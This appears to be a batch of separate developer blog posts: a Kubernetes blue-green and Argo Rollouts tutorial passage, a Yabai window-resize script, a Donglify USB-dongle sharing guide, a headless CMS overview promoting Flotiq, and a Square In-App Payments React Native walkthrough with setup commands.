Also, in the same way, we can create a kind of Blue-Green deployment: we have an old (_green_) version and a new (_blue_) version, but all traffic is sent to the new one. If we get errors on the new version, we can easily switch back to the previous one.
To do so, let's update the `.spec.selector` field of the Service to choose pods only from the first, "green", Deployment by using the _version_ label:
```
...
selector:
app: hello-pod
version: "1.0"
```
Redeploy and check:
```
$ curl adb***858.us-east-2.elb.amazonaws.com
1
$ curl adb***858.us-east-2.elb.amazonaws.com
1
```
Now, change the selector to `version: "2.0"` to switch traffic to the "blue" version:
```
$ kubectl patch services/hello-svc -p '{"spec":{"selector":{"version": "2.0"}}}'
service/hello-svc patched
```
Check it:
```
$ curl adb***858.us-east-2.elb.amazonaws.com
2
$ curl adb***858.us-east-2.elb.amazonaws.com
2
```
After everything is verified, we can drop the old version, and the "blue" one becomes the new "green".
When implementing Canary and Blue-Green deployments with the solutions described above, we get a bunch of issues: we need to manage multiple Deployments, track their versions and statuses, check for errors, etc.
Instead, we can do the same with Istio or Argo Rollouts.
Istio will be discussed later; for now, let's take a look at how this can be done with Argo Rollouts.
### Deployment and ReplicaSet
Before going forward, let's see how Deployments and updates work in Kubernetes.
So, a [Deployment](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/) is a Kubernetes resource type where we describe a template used to create new pods.
After such a Deployment is created, under the hood it will create a [ReplicaSet](https://kubernetes.io/docs/concepts/workloads/controllers/replicaset/) object which manages the pods from this Deployment.
During a Deployment update, a new ReplicaSet is created with the new configuration, and this ReplicaSet in its turn creates the new pods.
See [Updating a Deployment](https://kubernetes.io/docs/concepts/workloads/controllers/deployment/#updating-a-deployment).
Each pod created by a Deployment has a link to its ReplicaSet, and this ReplicaSet has a link to the corresponding Deployment.
Check the pod:
```
$ kubectl describe pod hello-deploy-d6c989569-96gqc
Name: hello-deploy-d6c989569-96gqc
…
Labels: app=hello-pod
…
Controlled By: ReplicaSet/hello-deploy-d6c989569
```
This pod is _Controlled By: ReplicaSet/hello-deploy-d6c989569_, so let's check this ReplicaSet:
```
$ kubectl describe replicaset hello-deploy-d6c989569
…
Controlled By: Deployment/hello-deploy
…
```
Here is our Deployment — _Controlled By: Deployment/hello-deploy_.
And the ReplicaSet template for pods is just the content of the `spec.template` of its Deployment:
```
$ kubectl describe replicaset hello-deploy-2-8878b4b
…
Pod Template:
Labels: app=hello-pod
pod-template-hash=8878b4b
version=2.0
Containers:
hello-pod:
Image: nginxdemos/hello
Port: 80/TCP
Host Port: 0/TCP
Environment: <none>
Mounts: <none>
Volumes: <none>
Events: <none>
```
Now, let's move on to Argo Rollouts.
### Argo Rollouts
Documentation — [https://argoproj.github.io/argo-rollouts](https://argoproj.github.io/argo-rollouts).
Argo Rollouts is another Kubernetes controller plus a set of Kubernetes Custom Resource Definitions, which together allow creating more complicated deployments to Kubernetes.
It can be used alone, or integrated with Ingress Controllers such as NGINX and the AWS ALB Controller, or with various Service Mesh solutions like Istio.
During a deployment, Argo Rollouts can perform checks of the new application version and run a rollback in case of issues.
To use Argo Rollouts instead of a Deployment, we create a new resource type, Rollout, where the deployment type and its parameters are defined in `spec.strategy`, for example:
```
...
spec:
replicas: 5
strategy:
canary:
steps:
- setWeight: 20
...
```
The rest of its fields are the same as in a common Kubernetes Deployment.
In the same way as a Deployment, a Rollout uses a ReplicaSet to spin up new pods.
Note that after installing Argo Rollouts you can still use standard Deployments with their `spec.strategy` alongside the new Rollouts. Also, you can easily migrate existing Deployments to Rollouts, see [Convert Deployment to Rollout](https://argoproj.github.io/argo-rollouts/migrating/).
See also [Architecture](https://argoproj.github.io/argo-rollouts/architecture/#architecture), [Rollout Specification](https://argoproj.github.io/argo-rollouts/features/specification/) and [Updating a Rollout](https://github.com/argoproj/argo-rollouts/blob/master/docs/getting-started.md#2-updating-a-rollout).
#### Install Argo Rollouts
Create a dedicated Namespace:
```
$ kubectl create namespace argo-rollouts
namespace/argo-rollouts created
```
Deploy the necessary Kubernetes CRDs, ServiceAccount, ClusterRoles, and the controller's Deployment from the manifest file:
```
$ kubectl apply -n argo-rollouts -f https://raw.githubusercontent.com/argoproj/argo-rollouts/stable/manifests/install.yaml
```
Later, when installing it in production, the [Argo Rollouts Helm](https://github.com/argoproj/argo-helm/tree/master/charts/argo-rollouts) chart can be used.
Check a pod — it’s the Argo Rollouts controller:
```
$ kubectl -n argo-rollouts get pod
NAME READY STATUS RESTARTS AGE
argo-rollouts-6ffd56b9d6-7h65n 1/1 Running 0 30s
```
#### kubectl plugin
Install a plugin for the `kubectl`:
```
$ curl -LO https://github.com/argoproj/argo-rollouts/releases/latest/download/kubectl-argo-rollouts-linux-amd64
$ chmod +x ./kubectl-argo-rollouts-linux-amd64
$ sudo mv ./kubectl-argo-rollouts-linux-amd64 /usr/local/bin/kubectl-argo-rollouts
```
Check it:
```
$ kubectl argo rollouts version
kubectl-argo-rollouts: v1.0.0+912d3ac
BuildDate: 2021-05-19T23:56:53Z
GitCommit: 912d3ac0097a5fc24932ceee532aa18bcc79944d
GitTreeState: clean
GoVersion: go1.16.3
Compiler: gc
Platform: linux/amd64
```
#### Deploying an application
Deploy a test application:
```
$ kubectl apply -f https://raw.githubusercontent.com/argoproj/argo-rollouts/master/docs/getting-started/basic/rollout.yaml
rollout.argoproj.io/rollouts-demo created
```
Check it:
```
$ kubectl get rollouts rollouts-demo -o yaml
apiVersion: argoproj.io/v1alpha1
kind: Rollout
…
spec:
replicas: 5
revisionHistoryLimit: 2
selector:
matchLabels:
app: rollouts-demo
strategy:
canary:
steps:
- setWeight: 20
- pause: {}
- setWeight: 40
- pause:
duration: 10
- setWeight: 60
- pause:
duration: 10
- setWeight: 80
- pause:
duration: 10
template:
metadata:
creationTimestamp: null
labels:
app: rollouts-demo
spec:
containers:
- image: argoproj/rollouts-demo:blue
name: rollouts-demo
ports:
- containerPort: 8080
name: http
protocol: TCP
…
```
Here, in the `spec.strategy`, the Canary deployment type is used, with a set of steps that perform the upgrade of the pods: first, 20% of the existing pods are replaced with the new version, then a pause to check whether they are working, then 40% are updated, another pause, and so on until all pods are upgraded.
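With `replicas: 5`, each `setWeight` step corresponds to a whole number of canary pods. A small sketch of that mapping (the rounding here is illustrative; see the Argo Rollouts docs for the exact behavior):

```python
replicas = 5
weights = [20, 40, 60, 80, 100]  # the setWeight steps from the Rollout above

for weight in weights:
    canary = round(replicas * weight / 100)  # pods running the new version
    stable = replicas - canary               # pods still on the old version
    print(f"setWeight {weight:>3}% -> {canary} new / {stable} old pods")
```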
By using the plugin installed above, we can add the `--watch` argument to see the upgrade process in real-time:
```
$ kubectl argo rollouts get rollout rollouts-demo --watch
```
Install a test Service:
```
$ kubectl apply -f https://raw.githubusercontent.com/argoproj/argo-rollouts/master/docs/getting-started/basic/service.yaml
service/rollouts-demo created
```
And make an update by setting a new image version:
```
$ kubectl argo rollouts set image rollouts-demo rollouts-demo=argoproj/rollouts-demo:yellow
```
Check the progress:

Done.
_Originally published at_ [_RTFM: Linux, DevOps, and system administration_](https://rtfm.co.ua/en/kubernetes-deployment-strategies-types-and-argo-rollouts/)_._
* * * | setevoy |
757,108 | Yabai - Toggle Window | Window Management is no doubt the most boring stuff that no one wants to be doing. I used to have... | 0 | 2021-07-12T14:02:32 | https://dev.to/flee2free/yabai-toggle-window-4536 | Window management is no doubt the most boring chore that no one wants to be doing. I used to have various shortcuts and hot corners set to size the window up or down as needed. [Magnet](https://magnet.crowdcafe.com/), [Moom](https://manytricks.com/moom/), [Spectacle](https://www.spectacleapp.com) were amongst the few that I used. Then I discovered [Yabai](https://github.com/koekeishiya/yabai), and it blew my mind. You no longer need to remember all the crazy shortcuts. The windows are neatly tiled for you to work on, and as a bonus that handful of no-longer-needed shortcuts can now be used for other important actions.
Yabai automatically partitions your windows using Binary Space Partitioning. There are a lot of tutorials dedicated to configuring and setting up Yabai, so I would suggest you look into those first. Along with Yabai, please also look into [SKHD](https://github.com/koekeishiya/skhd), which helps you set up the hotkeys that trigger Yabai calls.
Now, let's say you are comfortable with Yabai and its inner workings, including SKHD. I would like to share a small snippet that I use all the time to quickly float and toggle the size of a window with just a single shortcut.
##### resize.sh
```
#!/bin/bash
xpt=$(yabai -m query --windows --window | jq -re '. | .frame.x')
_log() {
terminal-notifier -message "$1"
}
_big() {
yabai -m window --grid 16:32:4:2:24:12
_log 'big'
}
_medium() {
yabai -m window --grid 16:32:6:2:20:12
_log 'medium'
}
_small() {
yabai -m window --grid 16:32:8:3:16:10
_log 'small'
}
[[ $xpt -gt 481 ]] && _small
[[ $xpt -le 481 && $xpt -gt 361 ]] && _medium
[[ $xpt -le 361 && $xpt -gt 241 ]] && _big
[[ $xpt -le 241 ]] && _small
```
Query the currently active window to retrieve its coordinates. The script uses `jq` to parse the JSON output that the `yabai` command prints: `xpt=$(yabai -m query --windows --window | jq -re '. | .frame.x')`
Yabai uses a grid system to describe window geometry. I have defined a small window as follows: `yabai -m window --grid 16:32:8:3:16:10`.
Define various reference points on the x coordinate (`xpt`) to anchor the size of the window. E.g., in my setup the small window's left edge falls exactly at the 481-pixel point. Use the ranges to define a toggle that cycles between big, medium and small.
```
[[ $xpt -gt 481 ]] && _small
[[ $xpt -le 481 && $xpt -gt 361 ]] && _medium
[[ $xpt -le 361 && $xpt -gt 241 ]] && _big
[[ $xpt -le 241 ]] && _small
```
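The threshold values above can be derived from the grid definitions: in a `16:32:x:y:w:h` grid, the window's left edge sits at `screen_width * x / 32`. Assuming a 1920-pixel-wide display (an assumption on my part; the script itself doesn't state the resolution), the three presets land at:

```python
SCREEN_WIDTH = 1920  # assumption; adjust for your display
GRID_COLUMNS = 32    # second value of the <rows>:<cols>:... grid spec

# x offsets taken from the three grid definitions in resize.sh
presets = {"big": 4, "medium": 6, "small": 8}

for name, x_offset in presets.items():
    left_edge = SCREEN_WIDTH * x_offset // GRID_COLUMNS
    print(f"{name:>6}: left edge at x = {left_edge}")
# big: 240, medium: 360, small: 480 -- matching the 241/361/481 thresholds
```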
Now, the final part is triggering this shell script. I have assigned a hotkey combination with skhd as follows: `ctrl + cmd - c : ~/bin/resize.sh`. You need to add this line to your `skhdrc` (the configuration file for SKHD).
This is just a small inspiration; there is much more to play around with in this amazing tiling window manager.
## References
- [yabai](https://github.com/koekeishiya/yabai)
- [skhd](https://github.com/koekeishiya/skhd)
- [jq](https://github.com/stedolan/jq)
- [terminal-notifier](https://github.com/julienXX/terminal-notifier)
| flee2free | |
757,379 | How to copy a software protection dongle | The most efficient method of sharing a USB dongle over the Internet or a local network is with the... | 13,609 | 2021-07-12T19:14:51 | https://dev.to/a_lernin/how-to-copy-a-software-protection-dongle-3kc6 | dongle, security, usbkey | The most efficient method of sharing a USB dongle over the Internet or a local network is with the dedicated functionality of the dongle copying software solution **Donglify.**
**Donglify** is a sophisticated software application that enables users to create a virtual copy of a USB license dongle so it can be accessed remotely over a network. All network connections are encrypted so data transmission is fully secured. The app even lets you share a single physical USB dongle simultaneously with multiple remote users.
_The instructions provided below describe the three different ways of using protected software on a network by copying USB dongle keys._ The software runs on the Windows platform and can be used in the following ways.
### How to copy a USB dongle key
These steps enable a user to remotely connect to a computer with a physical connection to the required security key. Sharing the device across the network lets you use a virtual copy of a USB dongle to run the protected software resource from any remote location.
1. [**Create**](https://account.donglify.net/user/registration/) a Donglify account on the software’s website. After you create your account, [**download**](https://www.donglify.net/download/) and install the software on the machine with the attached dongle (the server) and the computer that will access the USB dongle copy remotely (the client).

2. Start Donglify on the two machines and log into the software using identical credentials.

3. Click "+" on the server to open a window from which you can view the USB dongles that are available to be shared. Select the device you wish to use and click _“Share”_. USB copy protection dongles that display a _“Multi-connect”_ icon can be shared simultaneously with multiple users.

4. Open Donglify on a client computer and locate the dongle shared by the server. After clicking _“Connect”_, the dongle key copy will be recognized by your system and give you the same level of functionality as if you were physically connected to the device.

Click _“Disconnect”_ when you are finished using the dongle and the connection will be terminated.
[**Here is a video guide**](https://youtu.be/FqW7ZWmRPXs )
### Using a login token to share a USB dongle copy
Creating a token provides a secure digital key that can be shared with other users. Sharing a token with a colleague lets them use Donglify’s functionality without accessing your Donglify account. This keeps your personal information safe and gives you control over who can access a specific copy of a dongle key. If you delete a token, the individual using it is immediately logged out of the Donglify account.
Create a token using the following simple steps.
1. Log into your online Donglify account.
2. Open the _“Tokens”_ tab and click on _“Create Token”_.
3. Choose a name for the token and click _“Create”_. It will immediately be listed and available to be shared.
4. Copy the token and share it with any users using a text message, email, or any other method.
If you need to delete the token, click the red “X” next to its creation date.
To use Donglify with a token, follow these steps:
1. Download and install Donglify on the computer that will access the dongle remotely.
2. Start the application, provide the token, and log into the account.
**Note: A token can be used simultaneously on multiple machines.**
[**Watch the video guide to learn more about this process.**](https://youtu.be/2bHcqDjI4c4 )
### Sending invitations to other Donglify account owners
You can invite users to remotely access a security key. This enables you to keep your account details private while letting others access a security key remotely. Follow these steps to send an invitation to use a security key:
1. Physically attach the dongle to your computer. Launch Donglify and click “+” to view the devices that can be shared. Locate the key you want to share, check its radio button, and click _“Share”._
2. Send an invitation directly to another user by typing the email address associated with another valid Donglify account and clicking the “+” icon. Donglify displays the email address and you will receive a _“Connected”_ message when your invitation has been accepted.
When you want to end the remote session, click _“More”_ next to the user’s email address and choose _“Disconnect”._
[**Check out the video for more information**](https://youtu.be/EEOXbb19hhM )
## Who gets the most out of Donglify
Donglify is useful in a wide variety of situations and to a range of IT professionals.
**Licensed software developers** can distribute a product trial to many customers without sending them hardware dongles. This saves time and money and lets the developer control when the dongle is removed from the Internet, shutting down access to the software.
**Large or medium business** owners who have remote technical staffs and employees can benefit from maintaining their hardware dongles in a centralized location and sharing them remotely as they are needed.
**Service providers** who need to perform software maintenance for their customers can benefit from the remote access to security keys provided by Donglify and can provide clients with more customized service.
**Owners of licensed software products protected with a USB security key** benefit by having the ability to use their licensed software without needing to carry around an extra piece of hardware.
As you can see, **copying a dongle can be important in a variety of situations.** It greatly expands the utility of protected software by eliminating the need to have the security key physically present when using an application. With the help of Donglify, using protected software requiring security keys remotely becomes a simple process. | a_lernin |
779,107 | Storing content in a structured way for later reuse - Content as a Service platforms | Publishing your content as an API If you are producing content as part of your everyday... | 0 | 2021-08-02T10:41:53 | https://dev.to/flotiq/storing-content-in-a-structured-way-for-later-reuse-content-as-a-service-platforms-36mc | cms, headlesscms, content, flotiq | 
### Publishing your content as an API
If you are producing content as part of your everyday business - it’s likely that your teams would like to repurpose the content for many different occasions and in different channels. Content written for a blog post can be often reused for social media, photos shot for an online ad can serve well for website images and so on. What’s the most convenient way to share that content across your teams? Providing content as APIs.
### What is an API
An API, or Application Programming Interface, is how developers interact with a specific system. They speak to systems through APIs; these APIs allow them to (primarily) read data from and write data to systems.
In the case of Content Management Systems, an API usually provides developers with the ability to create new content, and to read, update or delete existing objects. In developer lingo, these operations are called CRUD: Create, Read, Update and Delete.
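To make the CRUD idea concrete, here is a minimal sketch that models the four operations with an in-memory store standing in for a real CMS; the endpoint paths in the comments are hypothetical, not any specific product's API:

```python
store = {}

def create(content_id, data):       # POST /content/{type}
    store[content_id] = dict(data)

def read(content_id):               # GET /content/{type}/{id}
    return store.get(content_id)

def update(content_id, changes):    # PATCH /content/{type}/{id}
    store[content_id].update(changes)

def delete(content_id):             # DELETE /content/{type}/{id}
    store.pop(content_id, None)

create("post-1", {"title": "Hello"})
update("post-1", {"title": "Hello, world"})
print(read("post-1"))  # {'title': 'Hello, world'}
delete("post-1")
print(read("post-1"))  # None
```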
### How does an API help to reuse content
Storing your content in a Content Management System and accessing it through an API helps put structure and organise your assets. Regardless of the kind of data you’re storing in the system - text, images, files - organising it upfront is key to reusing it later. You could argue that storing it in folders on your hard drive is good enough, but not if you intend to utilize it in different channels - for example, web apps, mobile apps, websites and so on. Publishing data in a form that is easily accessible by developers allows you to reap the benefits of modern technologies and the multitude of channels that they offer.
To properly organise your digital content, you should look at Content Management Systems. However, using a traditional CMS can often lead to mixing your real content (for example news announcements) with the description of how they should appear in the user's web browsers. That’s a big problem because it makes it impossible to reuse that content in other channels - for example, as social media posts or messages sent to users’ phones or watches. We are recently observing attempts to combat this problem. The most interesting ones seem to be the so-called headless and decoupled content management systems.
### What is a headless CMS
A headless CMS is a system that allows developers to store content inside it - it acts as a content repository and has virtually no user interface. The main focus of a headless CMS is raw data and separating content from its presentation in a particular medium. In a headless system, content is usually made accessible to developers via APIs.
A headless system provides means to define different content models. For example, you will be able to define different models for storing:
- Product data,
- Images
- Blog posts,
- Information about stores offering your product.
Once a content model is defined - you will be able to start authoring content and at the same time - developers will be able to use that content inside their applications. Regardless of the choice of programming language or development platform - a REST API will allow any developer to work with the data stored in your system.
### What is content as a service (CaaS) platforms?
A content as a service platform is a system that publishes structured content in an organised way, separated from the front-end, so it's easily reusable across different channels and technologies. It's often offered as a fully managed online platform. Some of the platforms worth exploring include:
- [Flotiq](https://flotiq.com)
- [Contentful](https://contentful.com)
- [Storyblok](https://storyblok.com)
### What are the important features of a content as a service platform?
The best content as a service platforms offer easy-to-use tools for content authoring as well as for developers building services that consume that content. From the content editor's perspective, the most important features are:
- An easy to use text editor
- Content versioning
- Workflow support
- Image handling
As a developer - you would probably expect:
- Easy to use APIs,
- Ability to define and extend content models,
- Ability to define scoped API keys to access specific parts of the system,
- Powerful full-text search,
- Batch import / export of data,
- High performance, low latency content API,
- Fully-managed service.
### Why is Flotiq among the best content platforms?
Flotiq’s approach to building content models and content delivery make our system really stand out. Here are a couple of key differentiators.
- Once a content model is defined - developers are provided with a set of customized tools that are tailored to the specific needs of their project.
- Our customized, automatically generated APIs decrease the amount of work required to integrate systems with Flotiq’s content API.
- It’s extremely easy to connect systems that consume content stored in Flotiq in a no-code or low-code fashion.
- Flotiq’s powerful full-text search engine allows developers to easily implement search engines and find relevant content.
- Content editors can work comfortably with an easy-to-use interface.
- All content changes are versioned and audited.
- Complex workflows can be defined to support different publishing scenarios.
Sounds great? Try Flotiq and let me know how was your experience :) | likayeltsova |
757,496 | Card on File with React Native | Safely store and process credit cards with In-App Payments SDK on React Native | 0 | 2021-07-12T21:11:54 | https://developer.squareup.com/blog/card-on-file-with-react-native | reactnative, react, payments, mobile | ---
title: Card on File with React Native
published: true
description: Safely store and process credit cards with In-App Payments SDK on React Native
tags: reactnative, react, payments, mobile
canonical_url: https://developer.squareup.com/blog/card-on-file-with-react-native
cover_image: https://images.ctfassets.net/1wryd5vd9xez/7IbheaULjpvY7CzmXPQbi6/02fc2bb7efd290f396be864f0f820efc/thecorner_heroimage_iap_card-on-file_v1_20200319.png?w=2916&h=800&q=100&fm=webp&fit=fill&bg=rgb%3A000000
---
In this tutorial, we’ll show you how to accept payments in a React Native application using [Square’s In-App Payments SDK](https://developer.squareup.com/in-app-payments) and [React Native plugin](https://github.com/square/in-app-payments-react-native-plugin). I’ll also show you how to safely store customer card details so that they don’t have to be manually re-entered or re-swiped for future transactions.
In payment industry terms, this capability is known as [Card on File](https://squareup.com/us/en/point-of-sale/features/card-on-file), or CoF for short. For frequent transactions, e.g. ordering a Lyft or a Lime, having a card stored makes for a much snappier, lower-friction in-app user experience. Entering card details every time would be very tedious.

As a security-minded developer, I know you might be wondering: Is it safe to store a user’s credit card details? _Is this even legal?_
If you use Square, the answer is yes. Using the Square In-App Payments (IAP) SDK means that your application and database don’t actually come into contact with the real card details. Instead, your application interacts with something called a _nonce_.
A nonce is an encrypted payment token that can be exchanged with the Square API to process a payment. A card nonce represents a credit card and all the details the user typed in. The nonce is used to store cards and capture payments without compromising the user’s privacy or security. It’s just one of the key concepts of processing payments with Square that we’ll cover today.
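On the backend, that nonce is exchanged for a charge by calling Square's payments endpoint. Below is a sketch of the request body only; the field names follow Square's `CreatePayment` API, while the nonce value and amount are placeholders:

```python
import json
import uuid

nonce = "cnon:example-card-nonce"  # placeholder; supplied by the In-App Payments SDK

payment_request = {
    "source_id": nonce,                    # the card nonce from the client
    "idempotency_key": str(uuid.uuid4()),  # guards against duplicate charges on retry
    "amount_money": {"amount": 100, "currency": "USD"},  # amount is in cents: $1.00
}

print(json.dumps(payment_request, indent=2))
```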
**In this tutorial, you’ll download and run a React Native application that processes payments using Square’s In-App Payments SDK and React Native plugin, including Card on File transactions.**
## Prerequisites
No prior knowledge of React Native or Square is required, but you will need a Square account. You will need to be familiar with NPM, git and the command line.
### Square Account
A Square account will allow you to take payments and get your own API keys that you’ll use in this tutorial. Thankfully, this is easy. If you already have an active Square account, you can skip this step.
Use this link to sign up for a free account (pay only transaction fees):
> [Sign up for Square](https://squareup.com/signup?v=developers)
_Tip: During signup you can choose to order a magstripe reader, which you can use to take payments in person using the [Square Reader SDK](https://developer.squareup.com/reader-sdk)._
Finally, before continuing with the rest of the tutorial, your Square account will need to be enabled for payment processing, which means that you’ll need to provide information about the account’s owner. Visit [squareup.com/activate](http://squareup.com/activate) to enable it. If you’d prefer not to make actual card charges, your Square account comes with a [sandbox](https://developer.squareup.com/docs/testing/sandbox) that you can use instead. If you go the sandbox route, you’ll need to use the sandbox Application ID and Location ID instead in the examples below.
### Square Application and Location ID
Once you have an active Square account, you’ll need to create a new developer application in order to get your IDs and credentials.
Open the dashboard to create a new app:
> [Open the Square Application Dashboard](https://developer.squareup.com/apps)
_Tip: You’ll need to login with your Square account if you’re not logged in already._
Click on the “New Application” button. On the next screen, enter the name "In-App Payments SDK Quick Start" or something similar.

Next, click on the "In-App Payments SDK Quick Start" app to bring up your new Square Application’s settings page.
Open the Credentials page and copy down your Application ID and your Personal Access Token under ACCESS_TOKEN.

Next, open the Locations page and copy down the ID for a location that accepts card payments.
Keep your Application ID, Personal Access Token, and Location ID handy. You’ll need them later.
### Deploy backend app to Heroku
Using the Square In-App Payments SDK requires that you have a backend that the client device connects to and where the final payment processing step takes place. For the purposes of this tutorial, we’ve created an example backend we can use called the In-App Payments Server Quickstart.
The easiest way to deploy it is with cloud hosting provider [Heroku](https://www.heroku.com/), using a Deploy to Heroku button you’ll find in the GitHub README. All of the steps you’ll need to get it up and running are here:
> [Complete the In-App Payments Server Quickstart Setup](https://github.com/square/in-app-payments-server-quickstart)
Once you click the Deploy to Heroku button and signup or login to Heroku, you’ll be taken to a screen that looks like this.

Give the app a unique name and set the `ACCESS_TOKEN` value on the Heroku configuration page to the value from the previous step. Then click “Deploy app”.
_Tip: Note down the URL of your Heroku app, you’ll need it later. The format is https://<app-name>.herokuapp.com._
### Set up React Native
Next, we need to install React Native and its dependencies, which include [Xcode](https://developer.apple.com/xcode/) (for iOS) and/or [Android Studio](https://developer.android.com/studio/) in order to run the application in a simulator.
_Tip: Only one of Xcode or Android Studio is required to complete this tutorial, and instructions are provided for both._
To set up React Native, I recommend following the guide in the React Native documentation.
> [Follow the React Native Getting Started Guide](https://facebook.github.io/react-native/docs/getting-started.html)
Here are a few tips to help you get through it quickly:
* Choose “React Native CLI Quickstart” and not “Expo CLI Quickstart”
* Choose the right Development and Target OS (Android/iOS)
* Complete the whole guide, including creating and running a new application - this will make sure your setup is working
* See the [Troubleshooting page](https://facebook.github.io/react-native/docs/troubleshooting) if you encounter any issues
Once you’re done, you should have XCode and/or Android Simulator working, as well as the react-native NPM package installed.
### Additional Requirements
The Square IAP React Native plugin has [a few build requirements](https://github.com/square/in-app-payments-react-native-plugin/blob/master/README.md#build-requirements) of its own, which you’ll want to verify against your installation. If you’ve just done a fresh install with the latest versions, you should be OK. But if not, this list will tell you what you need to upgrade before continuing.
**Android**
* Android minSdkVersion is API 21 (Lollipop, 5.0) or higher.
* Android Target SDK version: API 28 (Android 9).
* Android Gradle Plugin: 3.0.0 or greater.
**iOS**
* Xcode version: 9.1 or greater.
* iOS Base SDK: 11.0 or greater.
* Deployment target: iOS 11.0 or greater.
If you’re targeting Android, one more step is required to successfully simulate the app. You’ll need to create an Android virtual device based on the Android 9 version of the Android SDK.
* In the Android Studio welcome screen, click “Configure”
* Click “AVD Manager”
* Click “Create Virtual Device”
* Choose any common hardware and click “Next”
* Click “Download” next to “Pie” (API 28, Android 9) on the System Image screen
* Once that’s done, click “Next” and finish the wizard

Pick this device to launch as the Android Simulator in the steps below.
## Set up the quickstart app
So far we’ve installed and configured our dependencies. Now we can move on to installing the React Native plugin and working with the example codebase.
In a nutshell, the React Native plugin provides a convenient set of interfaces to the native code running inside the Square In-App Payments SDK. To learn more about the background of the React Native plugin, check out this [announcement blog post](https://developer.squareup.com/blog/square-in-app-payments-sdk-for-react-native/).
### Clone the repository
For the next step, we will clone the GitHub repository that the plugin lives in: [square/in-app-payments-react-native-plugin](https://github.com/square/in-app-payments-react-native-plugin/blob/master/react-native-in-app-payments-quickstart/README.md).
```bash
git clone git@github.com:square/in-app-payments-react-native-plugin
```
After the clone is complete, change directories into the app.
```bash
cd in-app-payments-react-native-plugin
```
Inside of this repository, there is a React Native application that lives in the `react-native-in-app-payments-quickstart` folder. This is the quickstart application we’ll use for the rest of the tutorial.
Change directories into the application directory:
```bash
cd react-native-in-app-payments-quickstart
```
Next, install dependencies with [Yarn](https://yarnpkg.com/en/).
```bash
yarn
```
### Configure the quickstart app
The quickstart app allows the user to purchase a "Super Cookie" for $1 that grants special powers (due to the high sugar amount, of course).
Before we can fire up the app (and our blood sugar level), we need to configure it with the Square Application ID we provisioned above.
Configuration variables in the quickstart app are stored in the file `app/Constants.js` ([view on GitHub](https://github.com/square/in-app-payments-react-native-plugin/blob/master/react-native-in-app-payments-quickstart/app/Constants.js)).
```javascript
const SQUARE_APP_ID = 'REPLACE_ME';
// Make sure to remove trailing `/` since the CHARGE_SERVER_URL puts it
const CHARGE_SERVER_HOST = 'REPLACE_ME';
const CHARGE_SERVER_URL = `${CHARGE_SERVER_HOST}/chargeForCookie`;
const GOOGLE_PAY_LOCATION_ID = 'REPLACE_ME';
const APPLE_PAY_MERCHANT_ID = 'REPLACE_ME';
// constants require for card on file transactions
const CREATE_CUSTOMER_CARD_SERVER_URL = `${CHARGE_SERVER_HOST}/createCustomerCard`;
const CHARGE_CUSTOMER_CARD_SERVER_URL = `${CHARGE_SERVER_HOST}/chargeCustomerCard`;
const CUSTOMER_ID = 'REPLACE_ME';
module.exports = {
  SQUARE_APP_ID,
  CHARGE_SERVER_HOST,
  CHARGE_SERVER_URL,
  GOOGLE_PAY_LOCATION_ID,
  APPLE_PAY_MERCHANT_ID,
  CUSTOMER_ID,
  CREATE_CUSTOMER_CARD_SERVER_URL,
  CHARGE_CUSTOMER_CARD_SERVER_URL,
};
```
Open the file. On line 16, replace `REPLACE_ME` with the Application ID value from above.
On line 18, set `CHARGE_SERVER_HOST` (replacing its `REPLACE_ME` value) to the URL of your Heroku backend. Include the `https://` but <span style="text-decoration:underline;">don’t</span> include the trailing slash.
On line 20, replace `REPLACE_ME` with the Location ID value from above for the Google Pay Location ID.
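For example, a filled-in version of those constants might look like the following. The values shown here are made-up placeholders, not real credentials; use your own Application ID, Heroku host, and Location ID:

```javascript
// Example values only; substitute your own credentials from the Square dashboard.
const SQUARE_APP_ID = 'sq0idp-EXAMPLE_APP_ID';
const CHARGE_SERVER_HOST = 'https://my-cookie-backend.herokuapp.com'; // no trailing slash
const CHARGE_SERVER_URL = `${CHARGE_SERVER_HOST}/chargeForCookie`;
const GOOGLE_PAY_LOCATION_ID = 'EXAMPLE_LOCATION_ID';
```

Note that `CHARGE_SERVER_URL` is built by appending a path to the host, which is why the trailing slash must be left off `CHARGE_SERVER_HOST`.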
### Create a customer
The last thing we need to do before we use the app is to create a customer using the [CreateCustomer](https://developer.squareup.com/docs/api/connect/v2#endpoint-customers-createcustomer) endpoint of the [Customers API](https://developer.squareup.com/docs/more-apis/customers/setup). Storing cards on file requires a customer record to attach them to.
In your terminal, run this command, first substituting `<REPLACE_ME>` with the Personal Access Token (`ACCESS_TOKEN`) value you noted down above.
```bash
curl --request POST https://connect.squareup.com/v2/customers \
  --header "Content-Type: application/json" \
  --header "Authorization: Bearer <REPLACE_ME>" \
  --header "Accept: application/json" \
  --data '{ "idempotency_key": "<RANDOM_STRING>", "given_name": "Lauren Nobel" }'
```
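If you'd rather see the same request body assembled in code, here's a small sketch. The key-generation line is just one reasonable way to produce a unique string; any string that is unique per logical request works as an idempotency key:

```javascript
// One reasonable way to produce a unique idempotency key; any unique string works.
const idempotencyKey = `create-customer-${Date.now()}-${Math.floor(Math.random() * 1e6)}`;

// The same request body the curl command above sends, built in code.
const body = JSON.stringify({
  idempotency_key: idempotencyKey,
  given_name: 'Lauren Nobel',
});
```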
If successful, you should see a response that represents our new customer:
```json
{
  "customer": {
    "id": "RPRANDHZ9RV4B77TPNGF5D5WDR",
    "created_at": "2019-06-14T15:32:50.412Z",
    "updated_at": "2019-06-14T15:32:50Z",
    "given_name": "Lauren Nobel",
    "preferences": {
      "email_unsubscribed": false
    },
    "creation_source": "THIRD_PARTY"
  }
}
```
The `customer.id` field from the JSON is what we’ll need to eventually store a card on file for this customer from the app.
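To make that concrete, pulling the ID out of the response looks like this (the response JSON is pasted in as a literal here purely for illustration):

```javascript
// The response from above, pasted in as a literal for illustration.
const response = {
  customer: {
    id: 'RPRANDHZ9RV4B77TPNGF5D5WDR',
    given_name: 'Lauren Nobel',
  },
};

const customerId = response.customer.id;
```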
In `app/Constants.js`, the file from above, set the value of the `CUSTOMER_ID` constant to the `customer.id` value from the response above.
```javascript
const CUSTOMER_ID = 'REPLACE_ME'
```
From the quickstart app’s perspective this will now be the Square customer who’s using it.
### Start the app - iOS
You’re now ready to run the app for the first time. Before we start the app, we need to launch the iOS simulator. This comes with XCode and gives us a virtual device that looks and acts like an iPhone or iPad.
The simulator should live in your Applications folder and simply be called Simulator or Simulator.app. Once you open the app, a virtual device you have configured should boot up automatically.

Now, we’re ready to use the react-native command to run our app in the simulator. Enter this command in your terminal and hit enter:
```bash
react-native run-ios
```
